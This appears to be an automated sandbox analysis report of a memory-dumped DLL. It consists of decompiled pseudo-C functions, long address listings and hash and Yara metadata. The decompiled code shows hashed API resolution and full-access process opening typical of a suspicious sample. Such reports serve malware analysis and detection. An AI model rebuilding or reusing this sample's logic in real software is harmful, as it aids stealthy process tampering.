						_push( !=  ? _t869 + 0xc : _t869);
						_t567 = E7099C3A8(_t869,  &_v416, 0x2710);
						E7099F6F0(_t955 + 0x184);
						E7099B608( &_v448);
						E7099CDE0( &_v416, __eflags);
						E7099F6F0( &_v480);
						E7099F6F0( &_v464);
						E7099F6F0( &_v432);
						E7099F6F0( &_v632);
						E7099B680( &_v592);
						E7099F6F0( &_v608);
						__eflags = _t567;
						return 0 | _t567 == 0x00000000;
					}
					_v388 = 0;
					do {
						E7099F620(_t955 + 0x188, 0);
						_push(0x23627913);
						_push(_t955 + 0x1cc);
						E709A1D00();
						E7099DD7C(_t955 + 0x1d0 - 8, _t955 + 0x1d0);
						_t879 = 0x7fffffff;
						E7099F578( &_v168, __eflags, _v92, E7099E94C(_v92, 0x7fffffff));
						E7099E054( &_v100);
						E7099D098( &_v108);
						_t836 =  &_v176;
						_t665 =  *((intOrPtr*)(_t836 + 0x28));
						 *((intOrPtr*)(_t836 - 0xf0)) = _v156;
						__eflags = E7099F568(_t836);
						if(__eflags <= 0) {
							L12:
							_t955 = _t955 + 0xffffffd8;
							asm("movq xmm0, [esp+0xac]");
							asm("pxor xmm1, xmm1");
							_t837 =  &_v528;
							_v588 = _t950;
							_v584 =  *((intOrPtr*)(_t837 + 0x78));
							asm("movq [esp+0x8], xmm0");
							_v572 =  *((intOrPtr*)(_t837 + 0x198));
							_v568 =  *((intOrPtr*)(_t837 + 0x184));
							asm("movq [esp+0x18], xmm1");
							asm("movq [esp+0x20], xmm1");
							_t622 = E7099AD04(__eflags);
							__eflags = _t622;
							if(_t622 != 0) {
								E709A218C(0x3e8, _t879, _t950);
								E7099F6F0( &_v196);
								E7099ADB8( &_v564,  &(( &_v172)[5]), __eflags,  &_v172);
								_t881 =  &_v176;
								__eflags =  *_t881 | _t881[1];
								if(__eflags != 0) {
									goto L18;
								}
								_t629 = E7099A5A4( &_v564, __eflags);
								_v444 = _t881;
								_t950 = _t629;
								__eflags = _t950 - 0xffffffffffffffff | _t881 - 0xffffffffffffffff;
								if((_t950 - 0xffffffffffffffff | _t881 - 0xffffffffffffffff) == 0) {
									goto L50;
								}
								goto L16;
							}
							L13:
							E7099F6F0( &_v196);
							goto L50;
						}
						_v404 = 0;
						while(1) {
							_t635 = E7099F558( &_v160, _v404);
							_t879 = _t635;
							_t955 = _t955 + 0xffffffd8;
							asm("movq xmm0, [esp+0x94]");
							_t844 =  &_v532;
							asm("movq xmm1, [0x709ab790]");
							_v592 = _t950;
							_v588 =  *((intOrPtr*)(_t844 + 0x78));
							asm("movq [esp+0x8], xmm0");
							_v576 = _t665;
							_v572 =  *((intOrPtr*)(_t844 + 0x80));
							_v568 =  *_t635 & 0x000000ff;
							_v564 = 0;
							asm("movq [esp+0x20], xmm1");
							_t638 = E7099AD04(__eflags);
							__eflags = _t638;
							if(_t638 == 0) {
								goto L13;
							}
							_t845 = 0x64;
							E709A218C(_t845, _t879, _t950);
							_t665 = _t665 + 1;
							asm("adc dword [ecx-0xf0], 0x0");
							 *((intOrPtr*)( &_v196 - 0xf4)) =  *((intOrPtr*)( &_v196 - 0xf4)) + 1;
							__eflags = E7099F568( &_v196) - _v440;
							if(__eflags > 0) {
								continue;
							}
							goto L12;
						}
						goto L13;
						L16:
						_t882 =  &_v432;
						_t633 =  *_t882 + 1;
						 *_t882 = _t633;
						__eflags = _t633 - 0xa;
					} while (_t633 != 0xa);
					goto L50;
				}
				L1:
				E7099F6F0( &_v532);
				E7099B680( &_v492);
				E7099F6F0( &_v508);
				return 0;
			}

0x70999144
0x70999148
0x7099914e
0x70999150
0x70999161
0x70999164
0x7099916b
0x70999174
0x7099917b
0x7099917f
0x70999188
0x7099918f
0x70999197
0x7099919c
0x709991ab
0x709991af
0x709991c4
0x709991da
0x709991e8
0x709991e9
0x709991ea
0x709991eb
0x709991ec
0x709991f3
0x709991f7
0x70999201
0x70999216
0x7099922c
0x7099923a
0x7099923b
0x7099923c
0x7099923d
0x7099923e
0x70999245
0x70999249
0x70999253
0x70999268
0x7099927e
0x7099928c
0x7099928d
0x7099928e
0x7099928f
0x70999290
0x70999297
0x7099929b
0x709992a5
0x709992ba
0x709992d0
0x709992de
0x709992df
0x709992e0
0x709992e1
0x709992e2
0x709992e9
0x709992ed
0x709992f7
0x7099930c
0x70999322
0x70999330
0x70999331
0x70999332
0x70999333
0x70999334
0x7099933b
0x7099933f
0x70999349
0x7099935e
0x70999374
0x70999382
0x70999383
0x70999384
0x70999385
0x7099938e
0x70999390
0x7099939b
0x709993a0
0x709993a5
0x709993b1
0x709993b6
0x709993bb
0x709993c7
0x709993cc
0x709993d1
0x709993dd
0x709993e2
0x709993e7
0x709993f3
0x709993f8
0x709993fd
0x70999409
0x7099940e
0x7099941a
0x70999420
0x70999430
0x70999435
0x7099943e
0x70999447
0x7099947e
0x70999487
0x7099948c
0x70999497
0x709994a1
0x709994a7
0x709994b9
0x709994cf
0x709994dd
0x709994de
0x709994df
0x709994e0
0x709994e1
0x709994e8
0x709994f2
0x709994f8
0x7099950a
0x70999520
0x7099952e
0x7099952f
0x70999530
0x70999531
0x70999532
0x70999539
0x70999543
0x70999549
0x7099955b
0x70999571
0x7099957f
0x70999580
0x70999581
0x70999582
0x70999583
0x70999586
0x70999589
0x7099959f
0x709995a4
0x709995a8
0x709995b3
0x709995b8
0x709995bd
0x709995c9
0x709995ce
0x709995d3
0x709995e7
0x709995ef
0x709995f6
0x70999606
0x70999614
0x70999620
0x70999622
0x70999629
0x7099963c
0x70999643
0x7099965c
0x7099966a
0x70999681
0x7099968f
0x70999694
0x709996a0
0x709996ad
0x709996b4
0x709996c9
0x709996ce
0x709996d5
0x709996dc
0x709996e3
0x7099a1d7
0x7099a1de
0x7099a1ea
0x7099a1f6
0x00000000
0x7099a1f6
0x709996f0
0x709996f7
0x00000000
0x00000000
0x7099970c
0x70999711
0x70999722
0x70999727
0x70999733
0x7099973a
0x70999740
0x70999745
0x70999748
0x7099974e
0x7099975c
0x7099975d
0x70999761
0x70999765
0x70999769
0x7099977e
0x70999789
0x7099978a
0x7099978e
0x70999792
0x70999796
0x709997a0
0x709997b6
0x709997b7
0x709997bb
0x709997bf
0x709997c3
0x709997df
0x709997f5
0x709997f5
0x709997fb
0x709997fd
0x70999800
0x70999805
0x7099980c
0x70999810
0x70999814
0x7099981a
0x70999820
0x70999832
0x70999848
0x70999856
0x70999857
0x70999858
0x70999859
0x7099985a
0x70999861
0x7099986b
0x70999871
0x70999883
0x70999899
0x709998a7
0x709998a8
0x709998a9
0x709998aa
0x709998ab
0x709998b2
0x709998bc
0x709998c2
0x709998d4
0x709998ea
0x709998f8
0x709998f9
0x709998fa
0x709998fb
0x709998fc
0x70999903
0x7099990d
0x70999913
0x70999925
0x7099993b
0x70999949
0x7099994a
0x7099994b
0x7099994c
0x7099994d
0x70999950
0x70999954
0x70999958
0x7099995e
0x70999964
0x70999976
0x7099998c
0x7099999a
0x7099999b
0x7099999c
0x7099999d
0x7099999e
0x709999a5
0x709999af
0x709999b5
0x709999c7
0x709999dd
0x709999eb
0x709999ec
0x709999ed
0x709999ee
0x709999ef
0x709999f6
0x70999a00
0x70999a06
0x70999a18
0x70999a2e
0x70999a3c
0x70999a3d
0x70999a3e
0x70999a3f
0x70999a40
0x70999a47
0x70999a51
0x70999a57
0x70999a69
0x70999a7f
0x70999a8d
0x70999a8e
0x70999a8f
0x70999a90
0x70999a96
0x70999a99
0x70999a9b
0x70999aa6
0x70999aab
0x70999ab0
0x70999abf
0x70999ac4
0x70999ac9
0x70999ad8
0x70999add
0x70999ae2
0x70999af1
0x70999af6
0x70999afb
0x70999b0a
0x70999b0f
0x70999b14
0x70999b23
0x70999b28
0x70999b2d
0x70999b3c
0x70999b41
0x70999b46
0x70999b55
0x70999b5a
0x70999b63
0x70999b6b
0x70999b70
0x70999b77
0x70999b84
0x70999b86
0x7099a1bf
0x7099a1c6
0x7099a1d2
0x00000000
0x7099a1d2
0x70999b8c
0x70999b95
0x70999b98
0x70999db0
0x70999db0
0x70999dbb
0x70999ddf
0x70999de1
0x00000000
0x00000000
0x70999de7
0x70999dec
0x70999df3
0x70999e00
0x70999e02
0x00000000
0x00000000
0x70999e08
0x70999e11
0x70999e12
0x70999e14
0x70999e17
0x00000000
0x00000000
0x00000000
0x70999e19
0x70999e1e
0x70999e29
0x70999e29
0x70999e2e
0x70999e35
0x70999e3c
0x70999e43
0x70999e48
0x70999e53
0x70999e55
0x00000000
0x00000000
0x70999e5b
0x70999e60
0x70999e67
0x70999e74
0x70999e76
0x00000000
0x00000000
0x70999e7c
0x70999e85
0x70999e86
0x70999e88
0x70999e8b
0x00000000
0x00000000
0x00000000
0x70999e8d
0x70999e9b
0x70999ea3
0x70999eae
0x70999eb5
0x70999ebc
0x70999ec0
0x70999ec4
0x70999eca
0x70999ed5
0x70999ee0
0x70999ee5
0x70999ee7
0x00000000
0x00000000
0x70999eed
0x70999ef8
0x70999f0e
0x70999f1e
0x70999f20
0x00000000
0x00000000
0x70999f26
0x70999f2b
0x70999f32
0x70999f3f
0x70999f41
0x00000000
0x00000000
0x70999f47
0x70999f50
0x70999f51
0x70999f53
0x70999f56
0x00000000
0x00000000
0x00000000
0x70999f58
0x70999f5d
0x70999f68
0x70999f71
0x70999f84
0x70999f85
0x70999f8c
0x70999f93
0x70999f9a
0x70999f9b
0x70999fa6
0x70999fa8
0x00000000
0x00000000
0x70999fae
0x70999fb3
0x70999fba
0x70999fc7
0x70999fc9
0x00000000
0x00000000
0x70999fcf
0x70999fd8
0x70999fd9
0x70999fdb
0x70999fde
0x00000000
0x00000000
0x00000000
0x70999fe0
0x7099a000
0x7099a005
0x7099a007
0x00000000
0x00000000
0x7099a016
0x7099a022
0x7099a02d
0x7099a039
0x7099a043
0x7099a043
0x7099a046
0x7099a04e
0x7099a05a
0x7099a069
0x7099a071
0x7099a074
0x7099a07d
0x7099a08d
0x7099a092
0x7099a09d
0x7099a0a6
0x7099a0b9
0x7099a0ba
0x7099a0c1
0x7099a0c8
0x7099a0cf
0x7099a0d0
0x7099a0db
0x7099a0dd
0x00000000
0x00000000
0x7099a0e3
0x7099a0e8
0x7099a0ef
0x7099a0fa
0x7099a0fc
0x7099a1b3
0x7099a1ba
0x00000000
0x7099a1ba
0x7099a102
0x7099a10b
0x7099a10c
0x7099a10e
0x7099a111
0x00000000
0x00000000
0x00000000
0x7099a113
0x7099a118
0x7099a123
0x7099a123
0x7099a126
0x7099a12a
0x7099a134
0x7099a138
0x7099a13f
0x7099a14a
0x7099a14e
0x7099a158
0x7099a162
0x7099a166
0x7099a16c
0x7099a177
0x7099a179
0x00000000
0x00000000
0x7099a183
0x7099a188
0x7099a18f
0x7099a19a
0x7099a19c
0x00000000
0x00000000
0x7099a19e
0x7099a1a7
0x7099a1a8
0x7099a1aa
0x7099a1ad
0x00000000
0x00000000
0x00000000
0x7099a1ad
0x7099a200
0x7099a202
0x7099a209
0x7099a20e
0x7099a211
0x7099a21f
0x7099a230
0x7099a23c
0x7099a248
0x7099a254
0x7099a260
0x7099a26c
0x7099a275
0x7099a27e
0x7099a287
0x7099a28e
0x00000000
0x7099a290
0x70999b9e
0x70999ba9
0x70999bb2
0x70999bb7
0x70999bc3
0x70999bc4
0x70999bd4
0x70999be2
0x70999bf5
0x70999c01
0x70999c0d
0x70999c19
0x70999c20
0x70999c23
0x70999c2e
0x70999c30
0x70999cdb
0x70999cdb
0x70999cde
0x70999ce7
0x70999ceb
0x70999cef
0x70999cf5
0x70999cf9
0x70999d05
0x70999d0f
0x70999d13
0x70999d19
0x70999d1f
0x70999d24
0x70999d26
0x70999d3e
0x70999d4a
0x70999d5e
0x70999d63
0x70999d6c
0x70999d6f
0x00000000
0x00000000
0x70999d75
0x70999d7a
0x70999d81
0x70999d8e
0x70999d90
0x00000000
0x00000000
0x00000000
0x70999d90
0x70999d28
0x70999d2f
0x00000000
0x70999d2f
0x70999c36
0x70999c41
0x70999c4f
0x70999c54
0x70999c56
0x70999c59
0x70999c62
0x70999c66
0x70999c6e
0x70999c74
0x70999c78
0x70999c7e
0x70999c8b
0x70999c8f
0x70999c93
0x70999c9b
0x70999ca1
0x70999ca6
0x70999ca8
0x00000000
0x00000000
0x70999cac
0x70999cad
0x70999cb2
0x70999cbc
0x70999cc3
0x70999cce
0x70999cd5
0x00000000
0x00000000
0x00000000
0x70999cd5
0x00000000
0x70999d96
0x70999d96
0x70999d9f
0x70999da0
0x70999da2
0x70999da2
0x00000000
0x70999dab
0x70999449
0x7099944d
0x70999456
0x7099945f
0x00000000

Strings

$EA, xrefs: 709991E1

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $EA
API String ID: 0-4251458306
Opcode ID: 51c827453157b351025679ede3f8a71f6d301f6d05b67b44cee672b673a8c910
Instruction ID: 94f364d87657188c247de742a32437adf7de0349905fa8b664ac921a377efb8c
Opcode Fuzzy Hash: 51c827453157b351025679ede3f8a71f6d301f6d05b67b44cee672b673a8c910
Instruction Fuzzy Hash: 40A259715287419EC721DF24C891BEEB7B4AFD6304F008A2DB4999B1A1FF30A949CB57

Uniqueness

Uniqueness Score: -1.00%

Function 7099A5A4, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E7099A5A4(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E7099B714(_t439 + 0x24, _t392, 0x7fffffff);
					if(E7099F56C(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E7099F6F0(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E709A218C(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E7099F6F0(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E7099F620(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E7099F620(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x709ab7a8]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E709A2F8C(0xa5eabdf8, 0xd1a06a90);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E7099F558( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E7099F558( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E7099B680(_t439 + 0x34);
											E7099B680(_t439 + 8);
											goto L65;
										}
										L62:
										E7099B680(_t439 + 0x34);
										E7099B680(_t439 + 8);
										goto L63;
									}
									_t392 = E7099F558(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E7099CB48(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E7099C33C(_t324);
									if(__eflags != 0) {
										break;
									}
									E7099F8C4(_t439 + 0x14, E7099F568(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E7099F558(_t439 + 0x14, E7099F568(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E709A2F8C(0xa5eabdf8, 0xf3119fba);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E7099F8C4(_t439 + 0x40, E7099F568(_t439 + 0x3c) + 4);
											 *(E7099F558(_t439 + 0x40, E7099F568(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E7099CDE0(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E7099F558( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E7099F558(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E7099AD04(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E7099CDE0(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E7099F558( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E7099F568( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E7099F568( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E7099F558( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E7099F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E709A382C( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E7099F568( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E7099F8C4( *((intOrPtr*)(_t439 + 8)), E7099F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E7099F568( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E7099F568( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E7099F558( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E7099F558( *((intOrPtr*)(_t439 + 4)), _t413);
										E709A382C(_t243,  *((intOrPtr*)(_t439 + 0x98)), E7099F568( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E7099F8C4( *((intOrPtr*)(_t439 + 4)), E7099F568( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E7099F8C4( *((intOrPtr*)(_t439 + 8)), E7099F568( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E7099F558( *((intOrPtr*)(_t439 + 8)), E7099F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E7099F8C4( *((intOrPtr*)(_t439 + 4)), E7099F568( *_t439) + 4);
								 *(E7099F558( *((intOrPtr*)(_t439 + 4)), E7099F568( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E7099F558(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E709A2F8C(0x4bcc7cba, 0x997e6547);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E7099F558(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E7099F8C4( *((intOrPtr*)(_t439 + 8)), E7099F568( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E7099F558( *((intOrPtr*)(_t439 + 8)), E7099F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E7099F558(_t439 + 0x28,  *(_t439 + 0x70));
										E7099F8C4( *((intOrPtr*)(_t439 + 4)), E7099F568( *_t439) + 4);
										 *(E7099F558( *((intOrPtr*)(_t439 + 4)), E7099F568( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E7099F558( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E7099F558( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E7099F568( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E7099F568( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E7099F558( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E7099F558( *((intOrPtr*)(_t439 + 4)), _t420);
										E709A382C( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E7099F568( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E7099F8C4( *((intOrPtr*)(_t439 + 4)), E7099F568( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E709A2F8C(0xa5eabdf8, 0x2c2324e8);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E7099F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E7099F568( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E7099F568( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E7099F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E7099F558( *((intOrPtr*)(_t439 + 8)), _t422);
										E709A382C( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E7099F568( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E7099F8C4( *((intOrPtr*)(_t439 + 8)), E7099F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E7099F558(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x7099a5ae
0x7099a5b0
0x7099a5bb
0x7099a5c1
0x7099a5c5
0x7099a5ca
0x7099a5d0
0x7099a5e0
0x00000000
0x7099a5e2
0x7099a5e2
0x7099a5ed
0x7099a5ed
0x7099ab6b
0x7099ab6d
0x7099ab6e
0x7099abad
0x7099abb1
0x7099abbf
0x7099abcd
0x7099abcd
0x7099abb8
0x7099abd3
0x7099abd8
0x00000000
0x7099abd8
0x7099abbc
0x7099abbd
0x00000000
0x7099a5f7
0x7099a5f7
0x7099a5fb
0x7099a702
0x7099a702
0x7099a707
0x7099a818
0x7099a81c
0x7099a821
0x7099a825
0x7099a94f
0x7099a951
0x7099a955
0x7099a95e
0x7099a967
0x7099a96b
0x7099a974
0x7099a97b
0x7099a97c
0x7099a980
0x7099a984
0x7099a988
0x7099a98a
0x7099aaf4
0x7099aaf4
0x7099aafc
0x7099ab14
0x7099ab16
0x7099ab18
0x7099ab52
0x7099ab52
0x7099ab54
0x7099ab54
0x7099ab57
0x7099ab72
0x7099ab86
0x7099ab89
0x7099ab8e
0x7099ab99
0x7099ab9a
0x7099ab9d
0x7099ab9f
0x7099aba8
0x00000000
0x7099aba8
0x7099ab59
0x7099ab5d
0x7099ab66
0x00000000
0x7099ab66
0x7099ab29
0x7099ab39
0x7099ab3d
0x7099ab3d
0x7099ab40
0x7099ab43
0x7099ab46
0x7099ab4c
0x00000000
0x00000000
0x00000000
0x7099ab4e
0x7099a992
0x7099a992
0x7099a994
0x7099a998
0x7099a99d
0x7099a99f
0x7099a9a3
0x7099a9a6
0x7099a9ae
0x7099a9b0
0x00000000
0x00000000
0x7099a9c7
